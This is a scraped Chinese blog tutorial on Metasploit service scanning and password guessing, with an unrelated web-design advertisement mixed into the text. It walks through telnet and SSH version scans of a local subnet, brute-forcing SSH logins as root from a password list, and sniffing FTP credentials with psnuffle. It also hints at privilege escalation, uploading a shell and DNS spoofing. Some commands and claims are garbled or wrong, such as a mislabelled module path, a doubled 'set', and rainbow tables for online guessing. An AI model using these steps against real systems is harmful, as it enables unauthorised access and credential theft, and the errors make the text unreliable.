建站
咨詢
售后
建站咨詢
新聞中心
有的時(shí)候我們利用了Nmap發(fā)現(xiàn)了端口和服務(wù)器上的服務(wù)器,然而我們并不是專業(yè)的hack,很多時(shí)候或許我們只能破FTP 共享和telnet,雖然夠低端,但是如果你已經(jīng)在一個(gè)局域網(wǎng)中了,上面3個(gè)服務(wù)器必然會(huì)存在。
創(chuàng)新互聯(lián)長(zhǎng)期為上千客戶提供的網(wǎng)站建設(shè)服務(wù),團(tuán)隊(duì)從業(yè)經(jīng)驗(yàn)10年,關(guān)注不同地域、不同群體,并針對(duì)不同對(duì)象提供差異化的產(chǎn)品和服務(wù);打造開放共贏平臺(tái),與合作伙伴共同營(yíng)造健康的互聯(lián)網(wǎng)生態(tài)環(huán)境。為依蘭企業(yè)提供專業(yè)的網(wǎng)站制作、成都網(wǎng)站設(shè)計(jì),依蘭網(wǎng)站改版等技術(shù)服務(wù)。擁有10余年豐富建站經(jīng)驗(yàn)和眾多成功案例,為您定制開發(fā)。
利用telnet來掃描
>search telnet_version 查找telnet掃描模塊
>use auxiliary/scanner/telnet/telnet_version 使用該模塊
>set RHOSTS 192.168.1.0/24 進(jìn)行整個(gè)網(wǎng)段掃描
>set THREADS 100 設(shè)置線程,這個(gè)數(shù)值可以自己定義
>run
利用ssh來掃描
>search ssh_version 查找ssh掃描模塊
>use auxiliary/scanner/telnet/ssh_version 這個(gè)版本可能是其他的
>set RHOSTS 192.168.1.0/24 進(jìn)行整個(gè)網(wǎng)段掃描
>set THREADS 100 設(shè)置線程,這個(gè)數(shù)值可以自己定義
>run
利用services來進(jìn)行掃描的方法都是大同小異,如果想利用其他的services進(jìn)行掃描,可以先
>search name_version 掃描出具體支持哪些服務(wù),當(dāng)然這是個(gè)積累的過程,常用的掃描還有oracle Mssql MySQL等等,當(dāng)然其實(shí)很多時(shí)候我們都是在抓瞎,Nmap足以解決問題了,更多的時(shí)候我們使用這個(gè)工具就是為了后面的猜解和監(jiān)聽做準(zhǔn)備,下面就講解一些猜解方法。
SSH服務(wù)口令猜解
SSH服務(wù)器相當(dāng)于windows下的FTP,我想多數(shù)管理員是不會(huì)配置密碼的,因?yàn)镾SH可以通過公鑰配對(duì)加密和驗(yàn)證的,而且很難猜解,當(dāng)然也許有的管理員就設(shè)置了賬戶密碼,這樣的時(shí)候我們就可以利用下面的命令進(jìn)行猜解了,當(dāng)然你得有一張足夠大的彩虹表
>search ssh 如果熟練了可以直接敲路徑了,反正我是記不住,而且模塊眾多,短時(shí)間很難掌握全。
>use auxiliary/scanner/ssh/ssh_login 選擇ssh口令猜解模塊
>set RHOSTS 192.168.1.105 設(shè)置hosts
>set USERNAME root 設(shè)置用戶名為root
>set set PASS_FILE/root/password.txt 這個(gè)字典自己做啦,工具很多,好壞就在于字典了
>set THREADS 50 設(shè)置線程數(shù),這個(gè)設(shè)置多了可能會(huì)死機(jī),會(huì)拒絕服務(wù),設(shè)置少了猜解會(huì)慢
>run
因?yàn)槲也粫?huì)拿自己的職業(yè)生涯開玩笑,所以我只在我自己搭建的環(huán)境下試驗(yàn)過,所以效果如何不敢評(píng)價(jià),總是不太好吧。
FTP嗅探工具psnuffle
這個(gè)工具是嗅探明文傳送的FTP的,所以所見即所得,內(nèi)網(wǎng)破解很實(shí)用,尤其是在win系統(tǒng)下,如果是利用IIS搭建的FTP服務(wù),那么你嗅探到的賬戶肯定具有user權(quán)限,而后怎么提權(quán)就自己想去吧,如果利用FTP軟件,這個(gè)賬戶即使得到個(gè)人感覺用處也不大,除非可以獲得寫權(quán)限,這樣可以上傳shell.好吧,不多講了,看下psnuffle這個(gè)繞口的工具的使用方法:
>use auxiliary/sniffer/psnuffle
>run
當(dāng)然你如果確定了端口也可以進(jìn)行一些限制,使用set命令就好,這個(gè)嗅探可能需要開那么幾個(gè)小時(shí),因?yàn)檎l也不知道啥時(shí)候會(huì)有人登陸FTP,有的時(shí)候我在局域網(wǎng)了,我寧愿做DNS欺騙,感覺這樣更加簡(jiǎn)單暴力,當(dāng)然,也許直接就被防火墻抓了,呵呵
網(wǎng)站標(biāo)題:Metasploit學(xué)習(xí)三常見的服務(wù)掃描與口令猜解
文章出自:http://www.ef60e0e.cn/article/pjocis.html
